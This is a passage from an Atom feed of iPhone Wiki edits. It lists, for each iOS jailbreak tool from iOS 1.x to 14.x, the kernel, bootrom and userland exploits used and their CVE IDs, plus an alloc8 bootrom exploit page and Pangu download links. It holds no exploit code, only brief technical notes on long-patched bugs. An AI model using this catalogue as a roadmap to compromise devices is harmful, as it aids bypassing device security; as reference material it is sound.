|-&lt;br /&gt;
| 1.0&lt;br /&gt;
| &amp;lt;code&amp;gt;fe77f02db26b9d3d142ee1f343a6fdbb&amp;lt;/code&amp;gt;&lt;br /&gt;
| &amp;lt;code&amp;gt;ab334937cd7bb7077eac25b223bd3784e8dcd7b7&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/NvwaStone_1.0.ipa 25PP]&lt;br /&gt;
| Initial version&lt;br /&gt;
|-&lt;br /&gt;
| 1.1&lt;br /&gt;
| &amp;lt;code&amp;gt;34c6b2ff4d21b6bf29f16d1793db8fd5 &amp;lt;/code&amp;gt;&lt;br /&gt;
| &amp;lt;code&amp;gt;e12cda775b8b8764e100eb7e6217b8ed7637ef20&amp;lt;/code&amp;gt;&lt;br /&gt;
| [http://dl.pangu.25pp.com/jb/NvwaStone_1.1.ipa 25PP]&lt;br /&gt;
| Ability to use Pangu's expired Enterprise certificate, which lasts until April 2017&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Name ==&lt;br /&gt;
&amp;quot;Pangu&amp;quot; is the name of the &amp;quot;[[wikipedia:Pangu|the first living being and the creator of all in some versions of Chinese mythology]]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
The 9.0-9.1 untether is nicknamed &amp;quot;Fuxi Qin&amp;quot;. This continues the tradition of Chinese mythology from the previous jailbreaks (Pangu Axe, XuanYuan Sword), by referring to the instrument (琴) carried by the legendary emperor Fuxi (伏羲)&lt;br /&gt;
&lt;br /&gt;
== See Also ==&lt;br /&gt;
*[[jbme|JailbreakMe for iOS 9.2-9.3.3]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Jailbreaks]]&lt;br /&gt;
[[Category:Jailbreaking]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=109505</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=109505"/>
		<updated>2020-11-29T22:28:26Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added Odyssey's exploit information&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.2~b)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Alloc8_Exploit&amp;diff=108059</id>
		<title>Alloc8 Exploit</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Alloc8_Exploit&amp;diff=108059"/>
		<updated>2020-10-21T23:03:09Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added alloc8 CVE ID&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
The '''alloc8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-9536 used to run unsigned code on both the [[Bootrom 359.3.2|new bootrom]] and the [[Bootrom 359.3|old bootrom]] [[N88AP|iPhone 3GS]] (and thereby [[jailbreak]] it). It is the first public [[Untethered jailbreak|untethered]] [[bootrom]] exploit for the [[Bootrom 359.3.2|new bootrom]] iPhone 3GS.&lt;br /&gt;
&lt;br /&gt;
[[User:axi0mX|axi0mX]] published a detailed analysis of alloc8 at [https://github.com/axi0mX/alloc8/blob/master/README GitHub] following his discovery of the exploit.&lt;br /&gt;
&lt;br /&gt;
[[ipwndfu]] is currently the primary and most simple way of using the alloc8 exploit. &lt;br /&gt;
&lt;br /&gt;
[[Category:Exploits]]&lt;br /&gt;
[[Category:Bootrom Exploits]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=107432</id>
		<title>Jailbreak Exploits</title>
